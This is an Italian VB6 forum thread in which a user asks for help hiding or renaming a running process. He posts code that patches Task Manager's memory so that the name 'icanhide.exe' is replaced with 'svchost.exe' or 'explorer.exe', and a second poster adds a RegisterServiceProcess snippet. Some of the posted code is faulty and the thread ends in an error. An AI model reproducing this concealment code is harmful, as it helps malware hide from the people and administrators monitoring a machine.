[VB6] Nascondere o rinominare processo

[Il Pazzo]

Ciao a tutti... sto provando a rinominare un processo ma non ci riesco... il codice è il seguente...

nel form:

Public Sub Timer3_Timer()

Timer3.Enabled = False
newproclist$ = ""
Dim myProcess As PROCESSENTRY32
Dim mySnapshot As Long

myProcess.dwSize = Len(myProcess)
mySnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)

ProcessFirst mySnapshot, myProcess

If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szexeFile, InStr(myProcess.szexeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, 1
REPSTRINGINPROC myProcess.th32ProcessID, 0
Else
DoEvents 'ignore this process
End If
End If

newproclist$ = "[" & myProcess.th32ProcessID & "]"

While ProcessNext(mySnapshot, myProcess)
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szexeFile, InStr(myProcess.szexeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, 1
REPSTRINGINPROC myProcess.th32ProcessID, 0
Else
DoEvents
End If
End If
newproclist$ = newproclist$ & "[" & myProcess.th32ProcessID & "]"
Wend

myproclist$ = newproclist$

Timer3.Enabled = True

End Sub

Private Sub REPSTRINGINPROC(PIDX As Long, SHOWME As Integer)

Dim c As Integer
Dim addr As Long
Dim buffer As String * 20016
Dim readlen As Long
Dim writelen As Long
If SHOWME = 1 Then
SRCHSTRING = UNICODE("svchost.exe")
REPSTRING$ = UNICODE("svchost.exe ")
DoEvents

For addr = 0 To 4000 ' loop through buffers
Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, readlen)

If readlen > 0 Then

startpos = 1
While InStr(startpos, buffer, SRCHSTRING) > 0
p = (addr) * 20000 + InStr(startpos, buffer, SRCHSTRING) - 1
Call WriteProcessMemory(myHandle, CLng(p), REPSTRING$, Len(REPSTRING$), bytewrite)
startpos = InStr(startpos, buffer, Trim(SRCHSTRING)) + 1 Wend
End If

Next addr
DoEvents

End If


SRCHSTRING = UNICODE("icanhide.exe")
REPSTRING$ = UNICODE("svchost.exe")

For addr = 0 To 4000
Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, readlen)
If readlen > 0 Then


startpos = 1
While InStr(startpos, buffer, SRCHSTRING) > 0
p = (addr) * 20000 + InStr(startpos, buffer, SRCHSTRING) - 1
Call WriteProcessMemory(myHandle, CLng(p), REPSTRING$, Len(REPSTRING$), bytewrite)
startpos = InStr(startpos, buffer, Trim(SRCHSTRING)) + 1 ' find next position
Wend
End If

Next addr
DoEvents
Close #1

End Sub
************************************************** *******************

nel modulo:

Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, lpSource As Any, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, Arguments As Long) As Long
Declare Function GetLastError Lib "kernel32" () As Long

Public Const FORMAT_MESSAGE_ALLOCATE_BUFFER = &H100
Public Const FORMAT_MESSAGE_FROM_SYSTEM = &H1000

Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, lProcessID As Long) As Long

Public Const TH32CS_SNAPPROCESS As Long = 2&

Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szexeFile As String * 260
End Type

Public myHandle As Long
Public myproclist$

Public Function UNICODE(PREREP As String)
REPIT$ = ""
For p = 1 To Len(PREREP)
REPIT$ = REPIT$ & Chr(0) & Mid(PREREP, p, 1)
Next p
UNICODE = REPIT$
End Function




Function InitProcHack(pid As Long)

pHandle = OpenProcess(&H1F0FFF, False, pid)

If (pHandle = 0) Then
InitProcHack = False
myHandle = 0
Else
InitProcHack = True
myHandle = pHandle
End If

End Function

************************************************** *******************

Qualcuno riesce ad aiutarmi???? :O

Magari qualcuno ha anche qualcoas di + sbrigativo e semplice :P

Graie e buona domenica

[Il Pazzo]

vi prego aiutatemi... è + urgente di qualcosa di impoortante :'(

[dwb]

Ma ti viene fuori qualche errore oppure non succede proprio nulla?

[Il Pazzo]

allora... all'inizio da qualche errore... era perchè non avevo dichiarato le variabili.... poi non succede proprio nulla...

il fatto è che il codice l'ho ricavato da un altro programma e in quel prog funziona... sono sicuro al 100% di non aver tralasciato nulla o di aver fatto modifiche che non lo avrebbero fatto funzionare.... l'unico dubbio che mi viene è nella dichiarazione delle variabili....

[Il Pazzo]

Il codice originale è il seguente:

Nel FORM:

Public Sub Timer3_Timer()

'Disable this event until processing complete. - Stops CPU hammering!!
Timer3.Enabled = False
newproclist$ = ""
Dim myProcess As PROCESSENTRY32
Dim mySnapshot As Long

myProcess.dwSize = Len(myProcess)
mySnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)

ProcessFirst mySnapshot, myProcess

'------------------
'Is this task new??
'------------------
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
'-----------------------
'Is this "taskmgr.exe"??
'-----------------------
If Left(myProcess.szexeFile, InStr(myProcess.szexeFile, Chr(0)) - 1) = "taskmgr.exe" Then
'----------------------------------------------------------
'Yes.. then disguise "icanhide.exe" in the processes memory
'----------------------------------------------------------
REPSTRINGINPROC myProcess.th32ProcessID, 1
REPSTRINGINPROC myProcess.th32ProcessID, 0
'Me.Hide
Else
DoEvents 'ignore this process
End If
End If

'create new process list (to replace myproclist$ later - the comparison list)
newproclist$ = "[" & myProcess.th32ProcessID & "]"

'Same as above but for each of the other processes
While ProcessNext(mySnapshot, myProcess)
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szexeFile, InStr(myProcess.szexeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, 1
REPSTRINGINPROC myProcess.th32ProcessID, 0
Else
DoEvents 'ignore this process
End If
End If
newproclist$ = newproclist$ & "[" & myProcess.th32ProcessID & "]"
Wend

'set myproclist to new processes against latest processes checked
myproclist$ = newproclist$

're-enable the timer
Timer3.Enabled = True

End Sub

Private Sub REPSTRINGINPROC(PIDX As Long, SHOWME As Integer)

If SHOWME = 1 Then Me.Show: DoEvents

If Not InitProcHack(PIDX) Then Exit Sub

'We are using 20016 as opposed to 20000 so that there is an overlap (so we catch the string if it crosses buffer limits!!)

Dim c As Integer
Dim addr As Long
Dim buffer As String * 20016
Dim readlen As Long
Dim writelen As Long
If SHOWME = 1 Then
SRCHSTRING = UNICODE("explorer.exe")
REPSTRING$ = UNICODE("svchost.exe ")
frmMain.lblStatus.Caption = "Process patching 1/2..."
frmMain.lblStatus2.Caption = "Process patching 1/2..."
DoEvents

For addr = 0 To 4000 ' loop through buffers
Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, readlen)
If addr / 100 = Int(addr / 100) Then
frmMain.lblStatus2.Caption = "Process patching 1/2 " & Int(addr / 40) & "%": frmMain.lblStatus.Caption = "Process patching 1/2 " & Int(addr / 40) & "%": Picture2.Width = Int(addr * (Picture1.Width / 4000)): DoEvents
End If

If readlen > 0 Then

startpos = 1
While InStr(startpos, buffer, SRCHSTRING) > 0
p = (addr) * 20000 + InStr(startpos, buffer, SRCHSTRING) - 1 ' position of string
Call WriteProcessMemory(myHandle, CLng(p), REPSTRING$, Len(REPSTRING$), bytewrite)
'highpoint = addr
startpos = InStr(startpos, buffer, Trim(SRCHSTRING)) + 1 ' find next position
Wend
End If

Next addr
frmMain.lblStatus.Caption = "Process patching 2/2..."
DoEvents

End If


SRCHSTRING = UNICODE("icanhide.exe")
REPSTRING$ = UNICODE("explorer.exe")

For addr = 0 To 4000 ' loop through buffers
If addr / 100 = Int(addr / 100) Then
frmMain.lblStatus.Caption = "Process patching 2/2 " & Int(addr / 40) & "%": frmMain.lblStatus.Caption = "Process patching 2/2 " & Int(addr / 40) & "%": Picture2.Width = Int(addr * (Picture1.Width / 4000)): DoEvents
End If
Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, readlen)
If readlen > 0 Then


startpos = 1
While InStr(startpos, buffer, SRCHSTRING) > 0
p = (addr) * 20000 + InStr(startpos, buffer, SRCHSTRING) - 1 ' position of string
Call WriteProcessMemory(myHandle, CLng(p), REPSTRING$, Len(REPSTRING$), bytewrite)
'highpoint = addr
startpos = InStr(startpos, buffer, Trim(SRCHSTRING)) + 1 ' find next position
Wend
End If

Next addr
DoEvents
Close #1
Me.Hide: DoEvents
'MsgBox highpoint
End Sub

************************************************** *******************
Nel Modulo:
Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, lpSource As Any, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, Arguments As Long) As Long
Declare Function GetLastError Lib "kernel32" () As Long

Public Const FORMAT_MESSAGE_ALLOCATE_BUFFER = &H100
Public Const FORMAT_MESSAGE_FROM_SYSTEM = &H1000

Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, lProcessID As Long) As Long

Public Const TH32CS_SNAPPROCESS As Long = 2&

Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szexeFile As String * 260
End Type

Public myHandle As Long
Public myproclist$

Public Function UNICODE(PREREP As String)
REPIT$ = ""
For p = 1 To Len(PREREP)
REPIT$ = REPIT$ & Chr(0) & Mid(PREREP, p, 1)
Next p
UNICODE = REPIT$
End Function




Function InitProcHack(pid As Long)

pHandle = OpenProcess(&H1F0FFF, False, pid)

If (pHandle = 0) Then
InitProcHack = False
myHandle = 0
Else
InitProcHack = True
myHandle = pHandle
End If

End Function

[Il Pazzo]

Ragaaaaaaaaaaaa ragaaaaaaaaaaaaaaaaa..... non fate cadere questa discussione nel dimenticato-i-o :'(

[kalosjo]

Per nascondere un processo ho trovato questo:

codice:

Public Const RSP_SIMPLE_SERVICE = 1
Public Const RSP_UNREGISTER_SERVICE = 0

Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Public Declare Function RegisterServiceProcess Lib "kernel32" _
                 (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32" () As Long

Public Sub HideApp(lbValue As Boolean)
    Dim lngProcessID As Long
    Dim lngReturn As Long
    
    lngProcessID = GetCurrentProcessId()
    
    If lbValue Then
        lngReturn = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)
    Else
        lngReturn = RegisterServiceProcess(pid, RSP_UNREGISTER_SERVICE)
    End If
End Sub

[Il Pazzo]

ah grazie... ma conosci qualche sito dove si possono trovare codici???

[Il Pazzo]

Non funziona... allora riesco a creare il .exe ma appena lo faccio partire mi dà il seguente errore:


RUN-TIME ERROR '453':
CAN'T FIND DLL ENTRY POINT REGISTERSERVICEPROCESS IN KERNELL32